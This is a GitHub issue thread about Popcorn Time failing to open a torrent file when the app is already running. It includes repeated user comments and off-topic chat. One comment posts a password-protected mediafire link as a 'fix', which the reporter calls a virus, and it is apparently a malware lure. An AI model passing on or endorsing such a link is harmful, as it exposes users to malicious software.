### ISSUE TITLE
Torrent file doesn't open when the app is already open

### ISSUE THREAD

**Issue by adler-amorette** [popcorntime/popcorntime#3040]
#### Operating System Version:
LMDE 6

#### Popcorn Time Version:
Popcorn-Time-0.5.1-amd64-0.44.5.deb

#### Download url:
github releases

#### Expected Behaviour:
Open the torrent file as if the app was closed.

#### Actual Behaviour:
Nothing happens.

#### Steps to reproduce the behaviour:
1. Open the app
2. Open a torrent file with the app through the context menu of a file manger,
or achieve the same by running `/opt/Popcorn-Time/Popcorn-Time <torrent_file>`,
in which case it will output "Opening in existing browser session".

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adler-amorette** [comment]
@jia6214876 do you really think someone will execute your virus? xD

**Comment by merseyV** [comment]
>Open the torrent file ~~as if~~ (when) the app was closed.

And that works?

I wouldn't have expected Popcorntime to open a (local) torrent file ... even if it was closed ... by using a context menu? Definitely not on a Mac, anyway! Only ever known it to work with 'drag/drop' file into its open window? I tried with 'Terminal' cmd (out of curiosity) but that's also a no-go! 

If you can load a torrent file using PTapp from context menu/cmd line .. I'm impressed - and jealous!! 😆

**Comment by merseyV** [comment]
>Open the torrent file ~~as if~~ (when) the app ~~was~~ (is) closed.

And that works?

I wouldn't have expected Popcorntime to open a (local) torrent file ... even if it was closed ... by using a context menu? Definitely not on a my Mac, anyway! Only ever known it to work with 'drag/drop' file into its open window? I tried with 'Terminal' cmd (out of curiosity) but that's also a no-go! 

If you can load a torrent file using PTapp from context menu/cmd line .. I'm impressed - and jealous!! 😆

**Comment by merseyV** [comment]
>Expected Behaviour:
>Open the torrent file ~~as if~~ (when) the app ~~was~~ (is) closed.

And that works?

I wouldn't have expected Popcorntime to open a (local) torrent file ... even if it was closed ... by using a context menu? Definitely not on a my Mac, anyway! Only ever known it to work with 'drag/dropping' a torrent file into its open window? I tried with 'Terminal' cmd (out of curiosity) but that's also a no-go! 

If you can load a torrent file using PTapp from context menu/cmd line .. I'm impressed - and jealous!! 😆 

... or have I misread you?

**Comment by dutchy1001** [comment]
You can add a .torrent file in pct. On top right you see 3 lines, hover over and it's called " torrent collection", you can import there a .torrent file (icons next to the search bar).

As I do not look for torrents myself ( I prefer .nzb files) I never got to use it. 

I also dont see the point of using it unless you look for a specific file.

@merseyV  do I hear an ECHO ECHO ECHO ECHO 🤣🤣🤣

**Comment by dutchy1001** [comment]
I not sure but to use a .torrent file you have to go through the app (like I mentioned above) and not with a command line.

**Comment by merseyV** [comment]
@dutchy1001 

It's probably just me! ... misreading his post? To be honest, I don't really understand what he's doing. (Lol)

>Expected Behaviour:
>Open the torrent file as if the app was closed.

If the app is closed ... is he expecting to open a (local) torrent file  (download) in PTapp, using a file manager menu/cmd line?
Or is he talking about a magnet link/torrent file - not a downloaded file. In which case: you can't (I think) open either with the app closed.

It's all "Greco-Russian" to me!! 🤣

**Comment by merseyV** [comment]
@dutchy1001 , you hit the nail ...

>I not sure but to use a .torrent file you have to go through the app (like I mentioned above) and not with a command line.

My point, exactly. If it's  a.torrent file or (the downloaded) Torrent file ... it's always been drag/drop into the open PTapp?
 
So what's he actually trying to do?

**Comment by merseyV** [comment]
@dutchy1001 , you hit the nail ...

>I not sure but to use a.torrent file you have to go through the app (like I mentioned above) and not with a command line.

My point, exactly: If it's a .torrent file or (the downloaded) Torrent file ... it's always been drag/drop into the open PTapp?
 
So what's he actually trying to do?

**Comment by dutchy1001** [comment]
> It's probably just me! ... misreading his post? 

It's not you, it's us 

>  I don't really understand what he's doing. (Lol)

same here

>So what's he actually trying to do?

beats me!!!

If you want to download a .torrent file use a torrent downloader, not PCT, that is not were its made for. 
Yes the option is there for a specific movie/series you want but still, if you know how to get a .torrent file you know how to use a torrent downloader aswell, use that instead.

Trying to complicate things for no reason in my opinion

**Comment by dutchy1001** [comment]
@merseyV 
totally off topic, how do I find you in reddit?
(I delete this message later again)

**Comment by merseyV** [comment]
>totally off topic, how do I find you in reddit?

Now, that's a  sorry tale .. but, to cut it short - You can't?

You might already know I've been having issues with Reddit, for well over a year .. it got worse! Refusals to connect me and dropping/blocking my posts (which I didn't notice, unless I log out?). I'd become "billy no-mates!" 😆 

Used my last 2 old (reserve) usernames in less than a month. Thought I'd give it one last try with a new sign-in (they've changed things since I reserved the old usernames) ... but made no difference, though. No mods on watch to unblock my posts, any more: no yiannis309 to watch my back! 😃  And to "top it off" ...  Ivan decided to delete my last 2 posts ... so I've thrown in the towel.🤣 🤣 🤣.

n.b. There's no PM in the GitHub??

**Comment by dutchy1001** [comment]
So I joined reddit for sweet F all then 🤣 
Unfortunatelly there is no github pm's (might be a good idea to add in github). 
So then your only option is then to join Slack 🤣 🤣 🤣.

I have notest that my vpn plays up when I sometimes connected to reddit (even as I added it to the exemtion list) so I have to turn that off to connect, might that cause your issue too?

**Comment by merseyV** [comment]
so I have to turn that off to connect, might that cause your issue too?

No VPN ... no Reddit .. no compromise for me!!

>So I joined reddit for sweet F all then 🤣

No! .. not at all? They're always looking for a reliable Mod? ... so they can bail-out!!! 🤣

>.So then your only option is then to join Slack 🤣 🤣 🤣.

![fb3fcf_420f6095293c451c917b29534c2e626d~mv2](https://github.com/user-attachments/assets/9693c736-890f-4e7b-b043-e0dbefa5cb04)

🤣 🤣

**Comment by dutchy1001** [comment]
who said I was reliable??

(deleting the other post now)

**Comment by adler-amorette** [comment]
@dutchy1001 

> if you know how to get a .torrent file you know how to use a torrent downloader aswell, use that instead

I use Popcorn to instantly watch, instead of downloading big(>5GB) files. Also to check if something is worth watching, or to find a specific moment from something I've watched.
I've always assumed other people use it for the same purpose.

Recently I found out there's a VLC plugin for bittorrent, which works perfectly for me, except for the lack of indication of download speed (though it's not particularly needed).
